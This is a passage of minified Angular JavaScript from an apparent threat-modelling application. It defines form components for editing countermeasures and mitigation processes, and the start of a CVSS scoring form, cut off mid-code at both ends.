"),m(33,"mat-select",9),he("valueChange",function(n){return be(e),Me(B().countermeasure.MitigationState=n)}),oe(34,"translate"),s(35,"\n      "),ne(36,c5e,3,4,"mat-option",10),s(37,"\n    "),u(),s(38,"\n  "),u(),s(39,"\n  "),ne(40,l5e,3,3,"mat-icon",11),s(41,"\n  "),m(42,"mat-form-field",12),s(43,"\n    "),m(44,"mat-label"),s(45),oe(46,"translate"),u(),s(47,"\n    "),m(48,"mat-select",13),he("valueChange",function(n){return be(e),Me(B().countermeasure.MitigationProcess=n)})("selectionChange",function(){return be(e),Me(B().mitigationProcessChange.emit())}),s(49,"\n      "),m(50,"input",14),he("keyup",function(n){return be(e),Me(B().OnSearchMitigationProcess(n))}),oe(51,"translate"),u(),s(52,"\n      "),m(53,"mat-option"),s(54),oe(55,"translate"),u(),s(56,"\n      "),ne(57,d5e,2,2,"mat-option",10),s(58,"\n    "),u(),s(59,"\n    "),m(60,"button",15),he("click",function(n){return be(e),B().EditMitigationProcess(),Me(n.stopPropagation())}),oe(61,"translate"),s(62,"\n      "),m(63,"mat-icon"),s(64,"edit"),u(),s(65,"\n    "),u(),s(66,"\n    "),m(67,"button",16),he("click",function(n){return be(e),B().AddMitigationProcess(),Me(n.stopPropagation())}),oe(68,"translate"),s(69,"\n      "),m(70,"mat-icon"),s(71,"add"),u(),s(72,"\n    "),u(),s(73,"\n  "),u(),s(74,"\n  "),it(75,"br"),s(76,"\n  "),ne(77,m5e,8,4,"mat-form-field",17),s(78,"\n  "),ne(79,h5e,15,9,"mat-form-field",18),s(80,"\n  "),m(81,"mat-form-field",19),s(82,"\n    "),m(83,"mat-label"),s(84),oe(85,"translate"),u(),s(86,"\n    "),it(87,"input",20),s(88,"\n  "),u(),s(89,"\n  "),it(90,"br"),s(91,"\n  "),m(92,"mat-form-field",8),s(93,"\n    "),m(94,"mat-label"),s(95),oe(96,"translate"),oe(97,"translate"),u(),s(98,"\n    "),m(99,"mat-select",21),he("valueChange",function(n){return be(e),Me(B().countermeasure.Control=n)}),s(100,"\n      "),m(101,"input",14),he("keyup",function(n){return be(e),Me(B().OnSearchControls(n))}),oe(102,"translate"),u(),s(103,"\n      "),m(104,"mat-option"),s(105),oe(106,"translate"),u(),s(107,"\n      "),ne(108,p5e,4,2,"mat-optgroup",22),s(109,"\n    "),u(),s(110,"\n    "),m(111,"button",16),he("click",function(n){return be(e),B().AddControl(),Me(n.stopPropagation())}),oe(112,"translate"),s(113,"\n      "),m(114,"mat-icon"),s(115,"add"),u(),s(116,"\n    "),u(),s(117,"\n  "),u(),s(118,"\n  "),m(119,"mat-form-field",23),s(120,"\n    "),m(121,"mat-label"),s(122),oe(123,"translate"),u(),s(124,"\n    "),m(125,"textarea",24),he("ngModelChange",function(n){return be(e),Me(B().countermeasure.Description=n)}),u(),s(126,"\n  "),u(),s(127,"\n  "),it(128,"app-tags",25),s(129,"\n  "),m(130,"mat-accordion",26),s(131,"\n    "),ne(132,g5e,17,4,"mat-expansion-panel",27),s(133,"\n    "),ne(134,y5e,17,4,"mat-expansion-panel",27),s(135,"\n    "),ne(136,M5e,17,4,"mat-expansion-panel",28),s(137,"\n  "),u(),s(138,"\n  "),it(139,"br"),s(140,"\n  "),ne(141,D5e,40,20,"div",29),s(142,"\n"),u()}if(2&t){const e=B();let i,n;Ct("disable",!e.canEdit),C(5),ke(re(6,47,"properties.Name")),C(3),at("matTooltip",e.countermeasure.Name),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.countermeasure.Name),C(3),V("ngIf",e.countermeasure.Name),C(6),ke(re(18,49,"general.Number")),C(3),at("matTooltip",e.countermeasure.Number),V("ngModel",e.countermeasure.Number),C(2),V("ngIf",e.countermeasure.CheckUniqueNumber()),C(8),ke(re(31,51,"properties.Status")),C(3),at("matTooltip",re(34,53,e.GetMitigationStateName(e.countermeasure.MitigationState))),V("value",e.countermeasure.MitigationState),C(3),V("ngForOf",e.GetMitigationStates()),C(4),V("ngIf",!e.countermeasure.RuleStillApplies),C(5),ke(re(46,55,"properties.MitigationProcess")),C(3),at("matTooltip",null==e.countermeasure.MitigationProcess?null:e.countermeasure.MitigationProcess.Name),V("value",e.countermeasure.MitigationProcess),C(2),at("placeholder",re(51,57,"general.Search")),C(4),ct("",re(55,59,"properties.selectNone")," "),C(3),V("ngForOf",e.GetMitigationProcesses()),C(3),at("matTooltip",re(61,61,"general.Edit")),V("disabled",!e.countermeasure.MitigationProcess),C(7),at("matTooltip",re(68,63,"general.Add")),C(10),V("ngIf",!e.isManualEntry),C(2),V("ngIf",e.isManualEntry),C(5),ke(re(85,65,"general.Diagram")),C(3),at("matTooltip",null==(i=e.countermeasure.GetDiagram())?null:i.Name),V("spellcheck",e.dataService.HasSpellCheck)("value",null==(n=e.countermeasure.GetDiagram())?null:n.Name),C(8),za("",re(96,67,"general.Control")," (",re(97,69,"general.Informative"),")"),C(4),at("matTooltip",null==e.countermeasure.Control?null:e.countermeasure.Control.Name),V("value",e.countermeasure.Control),C(2),at("placeholder",re(102,71,"general.Search")),C(4),ke(re(106,73,"properties.selectNone")),C(3),V("ngForOf",e.GetControlGroups()),C(3),at("matTooltip",re(112,75,"general.Add")),C(11),ke(re(123,77,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.countermeasure.Description),C(3),V("tagableElement",e.countermeasure),C(4),V("ngIf",e.countermeasure.Control),C(2),V("ngIf",e.countermeasure.MitigationProcess),C(2),V("ngForOf",e.countermeasure.AttackScenarios),C(5),V("ngIf",e.dataService.Project.HasTesting)}}let cM=(()=>{class t{constructor(e,i,n,r,c,d,T){this.theme=c,this.dataService=d,this.dialog=T,this.searchCounter=0,this.canEdit=!0,this.isManualEntry=!1,this.elements=[],this.mitigationProcessChange=new Tt,this.searchTCString="",this.countermeasure=e,i&&(this.isManualEntry=i.Value),n&&(this.elements=n),r&&r.subscribe(k=>this.countermeasure=k)}get countermeasure(){return this._countermeasure}set countermeasure(e){this._countermeasure=e,this.controlGroups=this.mitigationProcesses=null}ngOnInit(){}onKeyDown(e){"F2"==e.key&&(e.preventDefault(),this.nameBox&&this.nameBox.nativeElement.select())}GetControlGroups(){return null==this.controlGroups&&(this.controlGroups=[],this.dataService.Config.GetControlGroups().forEach(e=>{e.Controls.length>0&&this.controlGroups.push({name:e.Name,Controls:e.Controls})})),this.controlGroups}OnSearchControls(e){this.searchCounter++,setTimeout(()=>{if(this.searchCounter--,0==this.searchCounter){this.controlGroups=null,this.GetControlGroups();const i=e.target.value.toLowerCase(),n=this.countermeasure.Control;this.controlGroups.forEach(r=>{r.Controls=r.Controls.filter(c=>c==n||c.Name.toLowerCase().includes(i))}),this.controlGroups=this.controlGroups.filter(r=>r.Controls.length>0)}},250)}GetTargetsNames(){if(this.countermeasure.Targets)return this.countermeasure.Targets.map(e=>e.Name).join(", ")}AddControl(){let e=this.dataService.Config.CreateControl(this.dataService.Config.ControlLibrary);this.dialog.OpenAddControlDialog(e).subscribe(i=>{i?this.countermeasure.Control=e:this.dataService.Config.DeleteControl(e)})}AddMitigationProcess(){let e=this.dataService.Project.CreateMitigationProcess();this.countermeasure.MitigationProcess=e,this.dialog.OpenMitigationProcessDialog(e,!0).subscribe(i=>{i||this.dataService.Project.DeleteMitigationProcess(e)}),setTimeout(()=>{document.dispatchEvent(new KeyboardEvent("keydown",{key:"F2"}))},500)}EditMitigationProcess(){this.dialog.OpenMitigationProcessDialog(this.countermeasure.MitigationProcess,!1).subscribe(e=>{})}GetTestCases(){return this.dataService.Project.GetTesting().TestCases.filter(e=>!this.countermeasure.GetTestCases().includes(e))}GetFilteredTestCases(){return this.GetTestCases().filter(e=>e.Name.toLowerCase().includes(this.searchTCString.toLowerCase()))}OnLinkTestCase(e){e.AddLinkedCountermeasure(this.countermeasure),this.selectedTestCase=e}OnUnlinkTestCase(e){e.RemoveLinkedCountermeasure(this.countermeasure.ID),this.selectedTestCase==e&&(this.selectedTestCase=null)}OnSearchTCBoxClick(){var e,i,n;null===(n=null===(i=null===(e=this.searchTCBox)||void 0===e?void 0:e._elementRef)||void 0===i?void 0:i.nativeElement)||void 0===n||n.focus()}GetMitigationProcesses(){return null==this.mitigationProcesses&&(this.mitigationProcesses=this.dataService.Project.GetMitigationProcesses()),this.mitigationProcesses}OnSearchMitigationProcess(e){this.searchCounter++,setTimeout(()=>{if(this.searchCounter--,0==this.searchCounter){this.mitigationProcesses=null,this.GetMitigationProcesses();const i=e.target.value.toLowerCase(),n=this.countermeasure.MitigationProcess;this.mitigationProcesses=this.mitigationProcesses.filter(r=>n==r||r.Name.toLowerCase().includes(i))}},250)}GetMitigationStates(){return al.GetMitigationStates()}GetMitigationStateName(e){return al.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Jl,8),Ee(ff,8),Ee(Array,8),Ee(Tt,8),Ee(Oa),Ee(Yi),Ee(Wn))},t.\u0275cmp=Wt({type:t,selectors:[["app-countermeasure"]],viewQuery:function(e,i){if(1&e&&(Mi(n5e,5),Mi(o5e,5)),2&e){let n;Vt(n=Bt())&&(i.nameBox=n.first),Vt(n=Bt())&&(i.searchTCBox=n.first)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,Qc)},inputs:{countermeasure:"countermeasure",canEdit:"canEdit",isManualEntry:"isManualEntry",elements:"elements"},outputs:{mitigationProcessChange:"mitigationProcessChange"},decls:1,vars:1,consts:[[3,"disable",4,"ngIf"],["appearance","fill",2,"width","calc(100% - 85px)"],["matInput","","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["nameBox",""],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["appearance","fill",2,"width","70px","float","right"],["matInput","","type","number","min","0","required","","matTooltipShowDelay","1000",3,"ngModel","matTooltip","ngModelChange"],["style","color: red;","class","alert alert-danger",4,"ngIf"],["appearance","fill",1,"property-form-field"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"value",4,"ngFor","ngForOf"],["color","warn","style","margin-left: 5px;",3,"matTooltip",4,"ngIf"],["appearance","fill",1,"property-form-field",2,"margin-left","10px"],["no-space","","matTooltipShowDelay","1000",3,"value","matTooltip","valueChange","selectionChange"],["mat-menu-item","",1,"searchBox",3,"placeholder","keyup"],["mat-icon-button","","matSuffix","","matTooltipShowDelay","1000",2,"width","25px",3,"disabled","matTooltip","click"],["mat-icon-button","","matSuffix","","matTooltipShowDelay","1000",2,"width","25px",3,"matTooltip","click"],["appearance","fill","class","disable","style","width: calc(100% - 300px - 15px);",4,"ngIf"],["appearance","fill","style","width: calc(100% - 300px - 15px);",4,"ngIf"],["appearance","fill",1,"property-form-field","disable",2,"margin-left","10px"],["matInput","","matTooltipShowDelay","1000",3,"spellcheck","value","matTooltip"],["no-space","","matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"label",4,"ngFor","ngForOf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[3,"tagableElement"],[1,"expansion-panel-headers-align",2,"pointer-events","initial"],[4,"ngIf"],[4,"ngFor","ngForOf"],["class","row","style","margin-bottom: 10px;",4,"ngIf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[1,"alert","alert-danger",2,"color","red"],[3,"value"],["color","warn",2,"margin-left","5px",3,"matTooltip"],["appearance","fill",1,"disable",2,"width","calc(100% - 300px - 15px)"],["matInput","",3,"value"],["appearance","fill",2,"width","calc(100% - 300px - 15px)"],["matTooltipShowDelay","1000","multiple","",3,"value","matTooltip","valueChange"],[3,"label"],["matExpansionPanelContent",""],[3,"canEdit","control"],[3,"canEdit","mitigationProcess"],[3,"canEdit","attackScenario"],[1,"row",2,"margin-bottom","10px"],[1,"column1"],[1,"prop-list","reorder-list"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matMenuTriggerFor","matTooltip"],["addLinkedTCMenu","matMenu"],["mat-menu-item","",3,"ngModel","matMenuTriggerFor","placeholder","ngModelChange","click"],["searchTCBox",""],["mat-menu-item","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngFor","ngForOf"],["filteredTCList","matMenu"],["matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["style","margin: 10px 0 10px 10px;",4,"ngIf"],["mat-menu-item","","matTooltipShowDelay","1000",3,"matTooltip","click"],["matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line","",2,"pointer-events","initial"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin","10px 0 10px 10px"],[3,"testCase"]],template:function(e,i){1&e&&ne(0,x5e,143,79,"div",0),2&e&&V("ngIf",i.countermeasure)},styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.disable[_ngcontent-%COMP%]{pointer-events:none}.searchBox[_ngcontent-%COMP%]{padding:0 16px;width:calc(100% - 32px);height:35px!important;line-height:35px!important;font-size:14px;font-weight:400}']}),t})();const w5e=["nameBox"];function I5e(t,a){if(1&t){const e=Ye();m(0,"button",24),he("click",function(){return be(e),Me(B(2).mitigationProcess.Name="")}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n    "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function R5e(t,a){1&t&&(m(0,"mat-hint",25),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct("\n      ",re(2,1,"messages.error.numberAlreadyExists"),"\n    "))}function S5e(t,a){if(1&t&&(m(0,"mat-option",26),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetMitigationProcessStateName(e)))}}function k5e(t,a){if(1&t&&(m(0,"mat-option",26),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(e.Name)}}function P5e(t,a){if(1&t&&(s(0,"\n        "),it(1,"app-countermeasure",28),s(2,"\n      ")),2&t){const e=B().$implicit;C(1),V("countermeasure",e)}}function O5e(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n      "),m(2,"mat-expansion-panel-header"),s(3,"\n        "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n        "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n        "),u(),s(13,"\n      "),u(),s(14,"\n      "),ne(15,P5e,3,1,"ng-template",27),s(16,"\n    "),u()),2&t){const e=a.$implicit;C(5),ct("\n          ",re(6,2,"general.CountermeasureInfo"),"\n        "),C(4),ct("\n          ",e.Name,"\n          ")}}function N5e(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n  "),m(2,"mat-form-field",1),s(3,"\n    "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n    "),m(8,"input",2,3),he("ngModelChange",function(n){return be(e),Me(B().mitigationProcess.Name=n)}),u(),s(10,"\n    "),ne(11,I5e,6,3,"button",4),s(12,"\n  "),u(),s(13,"\n  "),m(14,"mat-form-field",5),s(15,"\n    "),m(16,"mat-label"),s(17),oe(18,"translate"),u(),s(19,"\n    "),m(20,"input",6),he("ngModelChange",function(n){return be(e),Me(B().mitigationProcess.Number=n)}),u(),s(21,"\n    "),ne(22,R5e,3,3,"mat-hint",7),s(23,"\n  "),u(),s(24,"\n  "),it(25,"br"),s(26,"\n  "),m(27,"mat-form-field",8),s(28,"\n    "),m(29,"mat-label"),s(30),oe(31,"translate"),u(),s(32,"\n    "),m(33,"mat-select",9),he("valueChange",function(n){return be(e),Me(B().mitigationProcess.MitigationProcessState=n)})("selectionChange",function(n){return be(e),Me(B().OnStateChange(n.value))}),oe(34,"translate"),s(35,"\n      "),ne(36,S5e,3,4,"mat-option",10),s(37,"\n    "),u(),s(38,"\n  "),u(),s(39,"\n  "),m(40,"mat-icon",11),oe(41,"translate"),s(42,"north_east"),u(),s(43,"\n  "),m(44,"mat-slider",12),he("ngModelChange",function(n){return be(e),Me(B().mitigationProcess.Progress=n)})("change",function(n){return be(e),Me(B().OnProgressChange(n.value))}),u(),s(45,"\n  "),m(46,"mat-form-field",13),s(47,"\n    "),m(48,"mat-label"),s(49),oe(50,"translate"),u(),s(51,"\n    "),m(52,"mat-select",14),he("valueChange",function(n){return be(e),Me(B().mitigationProcess.Countermeasures=n)})("selectionChange",function(){return be(e),Me(B().countermeasuresChange.emit())}),s(53,"\n      "),m(54,"input",15),he("keyup",function(n){return be(e),Me(B().OnSearchCountermeasure(n))}),oe(55,"translate"),u(),s(56,"\n      "),ne(57,k5e,2,2,"mat-option",10),s(58,"\n    "),u(),s(59,"\n  "),u(),s(60,"\n  "),m(61,"mat-form-field",13),s(62,"\n    "),m(63,"mat-label"),s(64),oe(65,"translate"),u(),s(66,"\n    "),m(67,"textarea",16),he("ngModelChange",function(n){return be(e),Me(B().mitigationProcess.Description=n)}),u(),s(68,"\n  "),u(),s(69,"\n  "),m(70,"div"),s(71,"\n    "),m(72,"h4"),s(73),oe(74,"translate"),m(75,"button",17),s(76,"\n        "),m(77,"mat-icon"),s(78,"more_vert"),u(),s(79,"\n      "),u(),s(80,"\n    "),u(),s(81,"\n    "),m(82,"mat-menu",null,18),s(84,"\n      "),m(85,"button",19),he("click",function(){return be(e),Me(B().AdoptFromMeasures())}),s(86,"\n        "),m(87,"span"),s(88),oe(89,"translate"),u(),s(90,"\n      "),u(),s(91,"\n    "),u(),s(92,"\n    "),it(93,"app-notes",20),s(94,"\n  "),u(),s(95,"\n  "),m(96,"div"),s(97,"\n    "),m(98,"h4"),s(99),oe(100,"translate"),u(),s(101,"\n    "),it(102,"app-notes",21),s(103,"\n  "),u(),s(104,"\n  "),m(105,"mat-accordion",22),s(106,"\n    "),ne(107,O5e,17,4,"mat-expansion-panel",23),s(108,"\n  "),u(),s(109,"\n  "),it(110,"br"),s(111,"\n"),u()}if(2&t){const e=Ti(83),i=B();Ct("disable",!i.canEdit),C(5),ke(re(6,39,"properties.Name")),C(3),at("matTooltip",i.mitigationProcess.Name),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.mitigationProcess.Name),C(3),V("ngIf",i.mitigationProcess.Name),C(6),ke(re(18,41,"general.Number")),C(3),at("matTooltip",i.mitigationProcess.Number),V("ngModel",i.mitigationProcess.Number),C(2),V("ngIf",i.mitigationProcess.CheckUniqueNumber()),C(8),ke(re(31,43,"properties.Status")),C(3),at("matTooltip",re(34,45,i.GetMitigationProcessStateName(i.mitigationProcess.MitigationProcessState))),V("value",i.mitigationProcess.MitigationProcessState),C(3),V("ngForOf",i.GetMitigationProcessStates()),C(4),at("matTooltip",re(41,47,"general.Progress")),C(4),V("displayWith",i.formatLabel)("ngModel",i.mitigationProcess.Progress),C(5),ke(re(50,49,"general.Countermeasures")),C(3),at("matTooltip",i.GetCountermeasuresName(i.mitigationProcess.Countermeasures)),V("value",i.mitigationProcess.Countermeasures),C(2),at("placeholder",re(55,51,"general.Search")),C(3),V("ngForOf",i.GetCountermeasures()),C(7),ke(re(65,53,"properties.Description")),C(3),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.mitigationProcess.Description),C(6),ct("\n      ",re(74,55,"general.Tasks"),"\n      "),C(2),V("matMenuTriggerFor",e),C(13),ke(re(89,57,"pages.modeling.mitigationprocess.adoptMeasures")),C(5),V("showTimestamp",!1)("hasCheckbox",!0)("canToggleTimestamp",!0)("notes",i.mitigationProcess.Tasks),C(6),ke(re(100,59,"general.Notes")),C(3),V("showTimestamp",!0)("hasCheckbox",!1)("canToggleCheckbox",!0)("notes",i.mitigationProcess.Notes),C(5),V("ngForOf",i.mitigationProcess.Countermeasures)}}let _T=(()=>{class t{constructor(e,i,n,r){this.theme=i,this.dataService=n,this.dialog=r,this.searchCounter=0,this.isEdtingArray=[[],[]],this.canEdit=!0,this.countermeasuresChange=new Tt,this.mitigationProcess=e}get mitigationProcess(){return this._mitigationProcess}set mitigationProcess(e){this._mitigationProcess=e,this.countermeasures=null}ngOnInit(){}onKeyDown(e){"F2"==e.key&&(e.preventDefault(),this.nameBox&&this.nameBox.nativeElement.select())}AdoptFromMeasures(){this.mitigationProcess.Countermeasures.forEach(e=>{this.mitigationProcess.Tasks.some(i=>i.Note==e.Name)||this.mitigationProcess.Tasks.push({Note:e.Name+" (CM"+e.Number.toString()+")",IsChecked:!1,Date:Date.now().toString(),Author:this.dataService.UserDisplayName,HasCheckbox:!0,ShowTimestamp:!1})})}OnStateChange(e){e==kl.WorkInProgress?(0==this.mitigationProcess.Progress&&(this.mitigationProcess.Progress=5),this.mitigationProcess.Countermeasures.forEach(i=>{[Ra.NotSet,Ra.Implemented].includes(i.MitigationState)&&(i.MitigationState=Ra.MitigationStarted)})):e==kl.Completed&&(this.mitigationProcess.Progress=100,this.mitigationProcess.Countermeasures.forEach(i=>{i.MitigationState==Ra.MitigationStarted&&(i.MitigationState=Ra.Implemented)}))}OnProgressChange(e){100==e?(this.mitigationProcess.MitigationProcessState=kl.Completed,this.mitigationProcess.Countermeasures.forEach(i=>{i.MitigationState==Ra.MitigationStarted&&(i.MitigationState=Ra.Implemented)})):e>0&&(this.mitigationProcess.MitigationProcessState=kl.WorkInProgress,this.mitigationProcess.Countermeasures.forEach(i=>{[Ra.NotSet,Ra.Implemented].includes(i.MitigationState)&&(i.MitigationState=Ra.MitigationStarted)}))}GetCountermeasures(){return null==this.countermeasures&&(this.countermeasures=this.dataService.Project.GetCountermeasures()),this.countermeasures}OnSearchCountermeasure(e){this.searchCounter++,setTimeout(()=>{if(this.searchCounter--,0==this.searchCounter){this.countermeasures=null,this.GetCountermeasures();const i=e.target.value.toLowerCase(),n=this.mitigationProcess.Countermeasures;this.countermeasures=this.countermeasures.filter(r=>n.includes(r)||r.Name.toLowerCase().includes(i))}},250)}GetCountermeasuresName(e){return null==e?void 0:e.map(i=>i.Name).join(", ")}formatLabel(e){return e.toFixed(0)+"%"}GetMitigationProcessStates(){return C2.GetMitigationStates()}GetMitigationProcessStateName(e){return C2.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(zp,8),Ee(Oa),Ee(Yi),Ee(Wn))},t.\u0275cmp=Wt({type:t,selectors:[["app-mitigation-process"]],viewQuery:function(e,i){if(1&e&&Mi(w5e,5),2&e){let n;Vt(n=Bt())&&(i.nameBox=n.first)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,Qc)},inputs:{canEdit:"canEdit",mitigationProcess:"mitigationProcess"},outputs:{countermeasuresChange:"countermeasuresChange"},decls:1,vars:1,consts:[[3,"disable",4,"ngIf"],["appearance","fill",2,"width","calc(100% - 85px)"],["matInput","","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["nameBox",""],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["appearance","fill",2,"width","70px","float","right"],["matInput","","type","number","min","0","required","","matTooltipShowDelay","1000",3,"ngModel","matTooltip","ngModelChange"],["style","color: red;","class","alert alert-danger",4,"ngIf"],["appearance","fill",1,"property-form-field"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange","selectionChange"],[3,"value",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",2,"margin-left","10px",3,"matTooltip"],["color","primary","thumbLabel","","tickInterval","5","step","5","min","0","max","100",2,"width","276px",3,"displayWith","ngModel","ngModelChange","change"],["appearance","fill",2,"width","100%"],["no-space","","multiple","","matTooltipShowDelay","1000",3,"value","matTooltip","valueChange","selectionChange"],["mat-menu-item","",1,"searchBox",3,"placeholder","keyup"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],["mat-icon-button","",3,"matMenuTriggerFor"],["moreMenu","matMenu"],["mat-menu-item","",3,"click"],[3,"showTimestamp","hasCheckbox","canToggleTimestamp","notes"],[3,"showTimestamp","hasCheckbox","canToggleCheckbox","notes"],[1,"expansion-panel-headers-align",2,"pointer-events","initial"],[4,"ngFor","ngForOf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[1,"alert","alert-danger",2,"color","red"],[3,"value"],["matExpansionPanelContent",""],[3,"countermeasure"]],template:function(e,i){1&e&&ne(0,N5e,112,61,"div",0),2&e&&V("ngIf",i.mitigationProcess)},styles:[".reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.property-form-field[_ngcontent-%COMP%]{width:300px}.disable[_ngcontent-%COMP%]{pointer-events:none}.searchBox[_ngcontent-%COMP%]{padding:0 16px;width:calc(100% - 32px);height:35px!important;line-height:35px!important;font-size:14px;font-weight:400}"]}),t})();var L5e=de(306),z5e=de.n(L5e);function W5e(t,a){if(1&t){const e=Ye();m(0,"table"),s(1,"\n  "),m(2,"tr"),s(3,"\n    "),m(4,"td"),s(5,"\n      Attack Vector (AV) \n      "),m(6,"mat-icon",1),oe(7,"translate"),s(8,"info"),u(),s(9,"\n      "),m(10,"button",2),he("click",function(){return be(e),Me(B().OpenNotes("AV"))}),oe(11,"translate"),s(12,"\n        "),m(13,"mat-icon",3),s(14,"edit_note"),u(),s(15,"\n      "),u(),s(16,"\n    "),u(),s(17,"\n    "),m(18,"td"),s(19,"\n      Scope (S) \n      "),m(20,"mat-icon",1),oe(21,"translate"),s(22,"info"),u(),s(23,"\n      "),m(24,"button",2),he("click",function(){return be(e),Me(B().OpenNotes("S"))}),oe(25,"translate"),s(26,"\n        "),m(27,"mat-icon",3),s(28,"edit_note"),u(),s(29,"\n      "),u(),s(30,"\n    "),u(),s(31,"\n  "),u(),s(32,"\n  "),m(33,"tr"),s(34,"\n    "),m(35,"td"),s(36,"\n      "),m(37,"mat-button-toggle-group",4),he("ngModelChange",function(n){return be(e),Me(B().entry.AV=n)})("change",function(){return be(e),Me(B().CalcScore())}),s(38,"\n        "),m(39,"mat-button-toggle",5),s(40,"Undefined"),u(),s(41,"\n        "),m(42,"mat-button-toggle",6),oe(43,"translate"),s(44,"Network"),u(),s(45,"\n        "),m(46,"mat-button-toggle",7),oe(47,"translate"),s(48,"Adjacent Network"),u(),s(49,"\n        "),m(50,"mat-button-toggle",8),oe(51,"translate"),s(52,"Local"),u(),s(53,"\n        "),m(54,"mat-button-toggle",9),oe(55,"translate"),s(56,"Physical"),u(),s(57,"\n      "),u(),s(58,"\n    "),u(),s(59,"\n    "),m(60,"td"),s(61,"\n      "),m(62,"mat-button-toggle-group",4),he("ngModelChange",function(n){return be(e),Me(B().entry.S=n)})("change",function(){return be(e),Me(B().CalcScore())}),s(63,"\n        "),m(64,"mat-button-toggle",5),s(65,"Undefined"),u(),s(66,"\n        "),m(67,"mat-button-toggle",10),oe(68,"translate"),s(69,"Unchanged"),u(),s(70,"\n        "),m(71,"mat-button-toggle",11),oe(72,"translate"),s(73,"Changed"),u(),s(74,"\n      "),u(),s(75,"\n    "),u(),s(76,"\n  "),u(),s(77,"\n  